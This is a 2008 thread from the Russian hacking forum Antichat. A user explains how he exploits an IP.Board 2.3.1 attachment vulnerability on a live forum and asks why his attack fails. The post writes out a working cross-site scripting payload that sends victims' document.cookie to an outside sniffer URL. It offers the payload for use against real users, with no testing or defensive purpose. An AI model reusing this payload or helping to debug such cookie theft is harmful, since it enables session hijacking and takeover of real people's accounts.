ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с аттачем
  #1  
Старый 21.08.2008, 14:15
Аватар для Zipper-rus
Zipper-rus
Познающий
Регистрация: 06.06.2008
Сообщений: 43
Провел на форуме:
536861

Репутация: 9
По умолчанию Помогите с аттачем

Кароче есть форум IP.Board 2.3.1 , я нашёл на этом форуме уязвимость подходящая под эту версию. Вот она :
http://forum.antichat.ru/showpost.php?p=695836&postcount=22

Кароче я прочитал зашёл на сайт и оставил пост туда прицепил файл (аттачем) , как и написано назвал any.html , и туда вписал <script>alert(/Hello/)</script> .

В итоге пост с файлом создался , и я перешёл по линку прикреплённого файла .html, Алерт сработал и я увидел (Hello). После удалил <script>alert(/Hello/)</script> и вписал <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> , теперь переходу по файлу файл загружается пустым , сматрю исходный текст в IE , и вижу что скрипт в файле есть , но в сниффере тишина (( Подскажите что я неправильно сделал и что нужно исправить ??
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите узнать пароль админа Моргенштерн АнтиАдмин 27 21.07.2008 01:35
Помогите написать программу на С++, генератор массива neon17 С/С++, C#, Delphi, .NET, Asm 3 20.01.2008 23:05
Помогите с вышкой. PomaH9991 Болталка 27 16.12.2007 23:13
Народ!!! Помогите НАМ!!! Помогите покончить с беспределом!!! Monah Чаты 7 24.08.2005 07:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ